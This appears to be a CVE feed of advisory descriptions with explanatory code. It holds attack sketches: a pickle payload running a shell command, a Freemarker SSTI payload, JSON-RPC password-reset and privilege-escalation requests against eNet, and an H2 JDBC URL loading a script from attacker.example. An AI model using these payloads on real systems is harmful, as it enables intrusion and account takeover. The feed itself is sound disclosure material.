| An information exposure vulnerability in Datart v1.0.0-rc.3 allows authenticated attackers to access sensitive data via a custom H2 JDBC connection string. |
| A Reflected Cross-site Scripting (XSS) vulnerability affecting ENOVIAvpm Web Access from ENOVIAvpm Version 1 Release 16 through ENOVIAvpm Version 1 Release 19 allows an attacker to execute arbitrary script code in a user's browser session. |
| A security flaw has been discovered in Intelbras VIP 3260 Z IA 2.840.00IB005.0.T. The vulnerability affects unknown functionality of the file /OutsideCmd; the manipulation results in a weak password-recovery mechanism. The attack can be launched remotely, but it is highly complex and exploitation appears difficult. It is recommended to upgrade the affected component. |
| The RegistrationMagic WordPress plugin before 6.0.7.2 does not have proper capability checks, allowing subscribers and above to create forms on the site. |
| LightLLM version 1.1.0 and prior contain an unauthenticated remote code execution vulnerability in PD (prefill-decode) disaggregation mode. The PD master node exposes WebSocket endpoints that receive binary frames and pass the data directly to pickle.loads() without authentication or validation. A remote attacker who can reach the PD master can send a crafted payload to achieve arbitrary code execution. |
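The danger of handing raw frames to pickle.loads() can be shown with a minimal, self-contained sketch. This is illustrative only, not the actual LightLLM exploit payload or endpoint:

```python
import os
import pickle

# Minimal illustration of why unpickling untrusted bytes is code
# execution: pickle invokes __reduce__ during deserialization, and it
# may return any callable plus arguments to invoke.
class Payload:
    def __reduce__(self):
        return (os.system, ("id",))  # attacker-chosen command

malicious_frame = pickle.dumps(Payload())

# What a vulnerable endpoint effectively does with a received binary frame:
pickle.loads(malicious_frame)  # runs `id` as a side effect of unpickling
```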
| A Server-Side Template Injection (SSTI) vulnerability in the Freemarker template engine of Datart v1.0.0-rc.3 allows authenticated attackers to execute arbitrary code via injecting crafted Freemarker template syntax into the SQL script field. |
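As a hedged sketch of what such an injection can look like: the Freemarker `Execute` primitive below is the classic SSTI payload for this engine, while the endpoint path and JSON field name are assumptions for illustration, not confirmed Datart API details:

```python
import requests

# Classic Freemarker SSTI primitive: instantiate the built-in Execute
# utility and call it with a shell command.
SSTI_PAYLOAD = (
    '<#assign ex="freemarker.template.utility.Execute"?new()>'
    '${ex("id")}'
)

# Hypothetical request shape: the URL and the "script" field are
# assumptions; the attacker is authenticated per the description.
requests.post(
    "http://datart.example/api/v1/data-provider/execute",
    json={"script": f"SELECT 1 /* {SSTI_PAYLOAD} */"},
    headers={"Authorization": "Bearer <attacker session token>"},
)
```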
| eNet SMART HOME server 2.2.1 and 2.3.1 ships with default credentials (user:user, admin:admin) that remain active after installation and commissioning without enforcing a mandatory password change. Unauthenticated attackers can use these default credentials to gain administrative access to sensitive smart home configuration and control functions. |
| eNet SMART HOME server 2.2.1 and 2.3.1 contains a missing authorization vulnerability in the resetUserPassword JSON-RPC method that allows any authenticated low-privileged user (UG_USER) to reset the password of arbitrary accounts, including those in the UG_ADMIN and UG_SUPER_ADMIN groups, without supplying the current password or having sufficient privileges. By sending a crafted JSON-RPC request to /jsonrpc/management, an attacker can overwrite existing credentials, resulting in direct account takeover with full administrative access and persistent privilege escalation. |
| eNet SMART HOME server 2.2.1 and 2.3.1 contains a privilege escalation vulnerability due to insufficient authorization checks in the setUserGroup JSON-RPC method. A low-privileged user (UG_USER) can send a crafted POST request to /jsonrpc/management specifying their own username to elevate their account to the UG_ADMIN group, bypassing intended access controls and gaining administrative capabilities such as modifying device configurations, network settings, and other smart home system functions. |
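A minimal sketch of both JSON-RPC abuses follows. The /jsonrpc/management endpoint and the method names come from the two descriptions above; the host and the exact parameter names are assumptions for illustration:

```python
import requests

BASE = "http://enet-server.local/jsonrpc/management"  # hypothetical host
session = requests.Session()  # assumed authenticated as a UG_USER account

# resetUserPassword: overwrite an administrator's credentials without
# knowing the current password (parameter names are assumptions).
session.post(BASE, json={
    "jsonrpc": "2.0", "id": 1,
    "method": "resetUserPassword",
    "params": {"userName": "admin", "newPassword": "attacker-chosen"},
})

# setUserGroup: elevate the attacker's own account to UG_ADMIN
# (parameter names are assumptions).
session.post(BASE, json={
    "jsonrpc": "2.0", "id": 2,
    "method": "setUserGroup",
    "params": {"userName": "attacker", "userGroup": "UG_ADMIN"},
})
```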
| Missing Authorization vulnerability in Smartypants SP Project & Document Manager allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects SP Project & Document Manager: from n/a through 4.70. |
| An issue in the Visual Studio Code extension Markdown Preview Enhanced v0.8.18 allows attackers to execute arbitrary code via uploading a crafted .md file. |
| An issue in Datart v1.0.0-rc.3 allows attackers to execute arbitrary code via the url parameter in the JDBC configuration. |
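A common way a controllable JDBC url becomes code execution, shown as a hedged illustration: H2 accepts an INIT parameter that runs an arbitrary SQL script on connect, and such a script can define and call a Java alias. Whether this is the exact vector used here is not confirmed by the description; host and script name are placeholders:

```python
# Illustrative H2 JDBC url abuse (INIT=RUNSCRIPT): the referenced script
# could, for example, CREATE ALIAS a Java method and CALL it.
MALICIOUS_JDBC_URL = (
    "jdbc:h2:mem:poc;"
    "INIT=RUNSCRIPT FROM 'http://attacker.example/evil.sql'"
)
```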
| Use After Free vulnerability in Apache Arrow C++.
This issue affects Apache Arrow C++ from 15.0.0 through 23.0.0. It can be triggered when reading an Arrow IPC file (but not an IPC stream) with pre-buffering enabled, if the IPC file contains data with variadic buffers (such as Binary View and String View data). Depending on the number of variadic buffers in a record batch column and on the temporal sequence of multi-threaded IO, a write to a dangling pointer could occur. The value (a `std::shared_ptr<Buffer>` object) that is written to the dangling pointer is not under direct control of the attacker.
Pre-buffering is disabled by default but can be enabled using a specific C++ API call (`RecordBatchFileReader::PreBufferMetadata`). The functionality is not exposed in language bindings (Python, Ruby, C GLib), so these bindings are not vulnerable.
The most likely consequence of this issue would be random crashes or memory corruption when reading specific kinds of IPC files. If the application allows ingesting IPC files from untrusted sources, this could plausibly be exploited for denial of service. Inducing more targeted kinds of misbehavior (such as confidential data extraction from the running process) depends on memory allocation and multi-threaded IO temporal patterns that are unlikely to be easily controlled by an attacker.
Advice for users of Arrow C++:
1. Check whether you enable pre-buffering on the IPC file reader (using `RecordBatchFileReader::PreBufferMetadata`).
2. If so, either disable pre-buffering (which may have adverse performance consequences), or switch to Arrow 23.0.1, which is not vulnerable. |
| In the Linux kernel, the following vulnerability has been resolved:
mm, shmem: prevent infinite loop on truncate race
When truncating a large swap entry, shmem_free_swap() returns 0 when the
entry's index doesn't match the given index due to lookup alignment. The
failure fallback path checks if the entry crosses the end border and
aborts when it happens, so truncate won't erase an unexpected entry or
range. But one scenario was ignored.
When `index` points to the middle of a large swap entry, and the large
swap entry doesn't go across the end border, find_get_entries() will
return that large swap entry as the first item in the batch with
`indices[0]` equal to `index`. The entry's base index will be smaller
than `indices[0]`, so shmem_free_swap() will fail and return 0 due to the
"base < index" check. The code will then call shmem_confirm_swap(), get
the order, check if it crosses the END boundary (which it doesn't), and
retry with the same index.
The next iteration will find the same entry again at the same index with
same indices, leading to an infinite loop.
Fix this by retrying with a round-down index, and abort if the index is
smaller than the truncate range. |
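The loop and the fix are easy to model outside the kernel. Below is a toy Python model (not kernel code) of the truncate loop: entries are (base, order) pairs covering [base, base + 2**order), lookups report the queried index rather than the entry base, and the fix retries at the rounded-down base, aborting when it falls before the truncate range:

```python
def free_swap(entry_base, index):
    # Mimics shmem_free_swap(): fails (returns 0) when the lookup index
    # is not the entry's base index.
    return 0 if entry_base < index else 1

def truncate(entries, start, end):
    index = start
    while index < end:
        # Mimics find_get_entries(): returns the entry covering `index`,
        # reporting indices[0] == index rather than the entry's base.
        hit = next(((b, o) for b, o in entries
                    if b <= index < b + (1 << o)), None)
        if hit is None:
            index += 1
            continue
        base, order = hit
        if free_swap(base, index):
            entries.remove(hit)
            index = base + (1 << order)
        else:
            # The buggy code retried with the SAME index here; since the
            # entry does not cross `end`, the border check passed and the
            # loop found the same entry forever. The fix: retry at the
            # round-down base, aborting if it precedes the range.
            if base < start:
                break
            index = base

# One order-2 entry based at index 4; truncation starts mid-entry.
truncate([(4, 2)], start=6, end=16)  # terminates with the fix applied
```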
| In the Linux kernel, the following vulnerability has been resolved:
macvlan: fix error recovery in macvlan_common_newlink()
valis provided a nice repro to crash the kernel:
ip link add p1 type veth peer p2
ip link set address 00:00:00:00:00:20 dev p1
ip link set up dev p1
ip link set up dev p2
ip link add mv0 link p2 type macvlan mode source
ip link add invalid% link p2 type macvlan mode source macaddr add 00:00:00:00:00:20
ping -c1 -I p1 1.2.3.4
He also gave a very detailed analysis:
<quote valis>
The issue is triggered when a new macvlan link is created with
MACVLAN_MODE_SOURCE mode and MACVLAN_MACADDR_ADD (or
MACVLAN_MACADDR_SET) parameter, lower device already has a macvlan
port and register_netdevice() called from macvlan_common_newlink()
fails (e.g. because of the invalid link name).
In this case macvlan_hash_add_source is called from
macvlan_change_sources() / macvlan_common_newlink():
This adds a reference to vlan to the port's vlan_source_hash using
macvlan_source_entry.
vlan is a pointer to the priv data of the link that is being created.
When register_netdevice() fails, the error is returned from
macvlan_newlink() to rtnl_newlink_create():
  if (ops->newlink)
          err = ops->newlink(dev, &params, extack);
  else
          err = register_netdevice(dev);
  if (err < 0) {
          free_netdev(dev);
          goto out;
  }
and free_netdev() is called, causing a kvfree() on the struct
net_device that is still referenced in the source entry attached to
the lower device's macvlan port.
Now all packets sent on the macvlan port with a matching source mac
address will trigger a use-after-free in macvlan_forward_source().
</quote valis>
With all that, my fix is to make sure we call macvlan_flush_sources()
regardless of @create value whenever the "goto destroy_macvlan_port;"
path is taken.
Many thanks to valis for following up on this issue. |
| In the Linux kernel, the following vulnerability has been resolved:
dmaengine: mmp_pdma: Fix race condition in mmp_pdma_residue()
Add proper locking in mmp_pdma_residue() to prevent use-after-free when
accessing descriptor list and descriptor contents.
The race occurs when multiple threads call tx_status() while the tasklet
on another CPU is freeing completed descriptors:
CPU 0                           CPU 1
-----                           -----
mmp_pdma_tx_status()
  mmp_pdma_residue()
    -> NO LOCK held
    list_for_each_entry(sw, ..)
                                DMA interrupt
                                dma_do_tasklet()
                                  -> spin_lock(&desc_lock)
                                  list_move(sw->node, ...)
                                  spin_unlock(&desc_lock)
                                  dma_pool_free(sw) <- FREED!
    -> access sw->desc <- UAF!
This issue can be reproduced when running dmatest on the same channel with
multiple threads (threads_per_chan > 1).
Fix by protecting the chain_running list iteration and descriptor access
with the chan->desc_lock spinlock. |
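The shape of both the race and the fix can be modeled with ordinary threads. This is a toy Python analogue, not driver code:

```python
import threading

lock = threading.Lock()  # analogue of chan->desc_lock
running = [{"freed": False, "len": 16} for _ in range(100_000)]

def residue_unlocked():
    # Buggy analogue: walks the list with NO lock held, so it can touch
    # descriptors the completion path has already freed.
    total = 0
    for sw in list(running):
        assert not sw["freed"], "use-after-free analogue"
        total += sw["len"]
    return total

def residue_locked():
    # Fixed analogue: iteration and descriptor access happen under the
    # same lock the completion path takes.
    with lock:
        return sum(sw["len"] for sw in running if not sw["freed"])

def tasklet():
    # Analogue of dma_do_tasklet(): removes descriptors under the lock,
    # then "frees" them.
    while running:
        with lock:
            if not running:
                break
            sw = running.pop()
        sw["freed"] = True  # dma_pool_free() analogue

t = threading.Thread(target=tasklet)
t.start()
try:
    residue_unlocked()  # may trip the assertion: a freed entry was read
except AssertionError:
    pass
t.join()
```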
| In the Linux kernel, the following vulnerability has been resolved:
btrfs: sync read disk super and set block size
When the user performs a btrfs mount, the block size of the block device
is not set correctly, because the user can concurrently set it to 0x4000
by executing the BLKBSZSET command.
Since the block size change also changes the mapping->flags value, this
further affects the result of the mapping_min_folio_order() calculation.
Let's analyze the following two scenarios:
Scenario 1: Without executing the BLKBSZSET command, the block size is
0x1000, and mapping_min_folio_order() returns 0;
Scenario 2: After executing the BLKBSZSET command, the block size is
0x4000, and mapping_min_folio_order() returns 2.
do_read_cache_folio() allocates a folio before the BLKBSZSET command
is executed. This results in the allocated folio having an order value
of 0. Later, after BLKBSZSET is executed, the block size increases to
0x4000, and the mapping_min_folio_order() calculation result becomes 2.
This leads to two undesirable consequences:
1. filemap_add_folio() triggers a VM_BUG_ON_FOLIO(folio_order(folio) <
mapping_min_folio_order(mapping)) assertion.
2. The syzbot report [1] shows a null pointer dereference in
create_empty_buffers() due to a buffer head allocation failure.
Synchronization based on the inode should be established between the
BLKBSZSET command and the read-cache-page path to prevent inconsistencies
in block size or mapping flags before and after folio allocation.
[1]
KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007]
RIP: 0010:create_empty_buffers+0x4d/0x480 fs/buffer.c:1694
Call Trace:
folio_create_buffers+0x109/0x150 fs/buffer.c:1802
block_read_full_folio+0x14c/0x850 fs/buffer.c:2403
filemap_read_folio+0xc8/0x2a0 mm/filemap.c:2496
do_read_cache_folio+0x266/0x5c0 mm/filemap.c:4096
do_read_cache_page mm/filemap.c:4162 [inline]
read_cache_page_gfp+0x29/0x120 mm/filemap.c:4195
btrfs_read_disk_super+0x192/0x500 fs/btrfs/volumes.c:1367 |
| In the Linux kernel, the following vulnerability has been resolved:
cgroup/dmem: fix NULL pointer dereference when setting max
An issue was triggered:
BUG: kernel NULL pointer dereference, address: 0000000000000000
#PF: supervisor read access in kernel mode
#PF: error_code(0x0000) - not-present page
PGD 0 P4D 0
Oops: Oops: 0000 [#1] SMP NOPTI
CPU: 15 UID: 0 PID: 658 Comm: bash Tainted: 6.19.0-rc6-next-2026012
Tainted: [O]=OOT_MODULE
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),
RIP: 0010:strcmp+0x10/0x30
RSP: 0018:ffffc900017f7dc0 EFLAGS: 00000246
RAX: 0000000000000000 RBX: 0000000000000000 RCX: ffff888107cd4358
RDX: 0000000019f73907 RSI: ffffffff82cc381a RDI: 0000000000000000
RBP: ffff8881016bef0d R08: 000000006c0e7145 R09: 0000000056c0e714
R10: 0000000000000001 R11: ffff888107cd4358 R12: 0007ffffffffffff
R13: ffff888101399200 R14: ffff888100fcb360 R15: 0007ffffffffffff
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000000000000 CR3: 0000000105c79000 CR4: 00000000000006f0
Call Trace:
<TASK>
dmemcg_limit_write.constprop.0+0x16d/0x390
? __pfx_set_resource_max+0x10/0x10
kernfs_fop_write_iter+0x14e/0x200
vfs_write+0x367/0x510
ksys_write+0x66/0xe0
do_syscall_64+0x6b/0x390
entry_SYSCALL_64_after_hwframe+0x76/0x7e
RIP: 0033:0x7f42697e1887
It was triggered by setting max without a limit value, with a command
like "echo test/region0 > dmem.max". To fix this issue, add a check that
the options string is valid after parsing the region_name. |
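The shape of the fix is plain input validation after the first parse step; a toy Python sketch (not the kernel parser) follows:

```python
def parse_dmem_max(line: str):
    # "echo test/region0 > dmem.max" yields a region name with no limit
    # value; the buggy path went on to compare a missing options string
    # (the strcmp() NULL dereference in the trace above).
    region_name, _, options = line.strip().partition(" ")
    if not options:
        raise ValueError("missing limit value after region name")
    return region_name, options

parse_dmem_max("test/region0 max")   # ok: ("test/region0", "max")
try:
    parse_dmem_max("test/region0")   # rejected instead of crashing
except ValueError as e:
    print(e)
```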
| In the Linux kernel, the following vulnerability has been resolved:
hwmon: (acpi_power_meter) Fix deadlocks related to acpi_power_meter_notify()
The acpi_power_meter driver's .notify() callback function,
acpi_power_meter_notify(), calls hwmon_device_unregister() under a lock
that is also acquired by callbacks in sysfs attributes of the device
being unregistered which is prone to deadlocks between sysfs access and
device removal.
Address this by moving the hwmon device removal in
acpi_power_meter_notify() outside the lock in question, but notice
that doing it alone is not sufficient because two concurrent
METER_NOTIFY_CONFIG notifications may be attempting to remove the
same device at the same time. To prevent that from happening, add a
new lock serializing the execution of the switch () statement in
acpi_power_meter_notify(). For simplicity, it is a static mutex
which should not be a problem from the performance perspective.
The new lock also allows the hwmon_device_register_with_info()
in acpi_power_meter_notify() to be called outside the inner lock
because it prevents the other notifications handled by that function
from manipulating the "resource" object while the hwmon device based
on it is being registered. The sending of ACPI netlink messages from
acpi_power_meter_notify() is serialized by the new lock too which
generally helps to ensure that the order of handling firmware
notifications is the same as the order of sending netlink messages
related to them.
In addition, notice that hwmon_device_register_with_info() may fail,
in which case resource->hwmon_dev will become an error pointer,
so add checks to acpi_power_meter_notify() and acpi_power_meter_remove()
to avoid attempting to unregister the hwmon device pointed to by it in
that case. |
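A toy Python model of the fix's shape (not driver code): perform the slow unregister outside the lock shared with attribute callbacks, and serialize whole notifications with a dedicated mutex so two CONFIG notifications cannot tear down the same device concurrently:

```python
import threading

state_lock = threading.Lock()   # analogue of the lock sysfs callbacks take
notify_lock = threading.Lock()  # analogue of the new static mutex

resource = {"hwmon_dev": None}

def hwmon_register():
    return object()   # stand-in for hwmon device registration

def hwmon_unregister(dev):
    # Stand-in for device removal; in the real driver this can wait for
    # attribute callbacks that themselves take the shared lock, which is
    # why it must not run with state_lock held.
    pass

def notify_config():
    with notify_lock:           # one notification at a time
        with state_lock:
            dev = resource["hwmon_dev"]
            resource["hwmon_dev"] = None
        if dev is not None:     # also skip failed/error-pointer registrations
            hwmon_unregister(dev)   # outside state_lock: no deadlock
        new_dev = hwmon_register()  # safe: notify_lock serializes us
        with state_lock:
            resource["hwmon_dev"] = new_dev
```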
| In the Linux kernel, the following vulnerability has been resolved:
rust_binder: correctly handle FDA objects of length zero
Fix a bug where an empty FDA (fd array) object with 0 fds would cause an
out-of-bounds error. The previous implementation used `skip == 0` to
mean "this is a pointer fixup", but 0 is also the correct skip length
for an empty FDA. If the FDA is at the end of the buffer, then this
results in an attempt to write 8 bytes out of bounds. This is caught and
results in an EINVAL error being returned to userspace.
The pattern of using `skip == 0` as a special value originates from the
C-implementation of Binder. As part of fixing this bug, this pattern is
replaced with a Rust enum.
I considered the alternate option of not pushing a fixup when the length
is zero, but I think it's cleaner to just get rid of the zero-is-special
stuff.
The root cause of this bug was diagnosed by Gemini CLI on first try. I
used the following prompt:
> There appears to be a bug in @drivers/android/binder/thread.rs where
> the Fixups oob bug is triggered with 316 304 316 324. This implies
> that we somehow ended up with a fixup where buffer A has a pointer to
> buffer B, but the pointer is located at an index in buffer A that is
> out of bounds. Please investigate the code to find the bug. You may
> compare with @drivers/android/binder.c that implements this correctly. |
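The shape of the fix, replacing a numeric sentinel with an explicit tagged type, can be sketched in Python (the kernel change itself is in Rust; the names below are illustrative):

```python
from dataclasses import dataclass
from typing import Union

@dataclass
class PointerFixup:
    target_offset: int   # previously encoded as skip == 0

@dataclass
class Skip:
    length: int          # a length of 0 (empty fd array) is now unambiguous

Fixup = Union[PointerFixup, Skip]

def apply_fixup(fixup: Fixup) -> None:
    # With the sentinel, an empty FDA (skip length 0) was misread as a
    # pointer fixup, producing the out-of-bounds write attempt described
    # above; the tagged type makes the two cases impossible to confuse.
    if isinstance(fixup, PointerFixup):
        print(f"translate pointer at offset {fixup.target_offset}")
    else:
        print(f"skip {fixup.length} bytes")

apply_fixup(Skip(length=0))  # valid no-op, not an out-of-bounds write
```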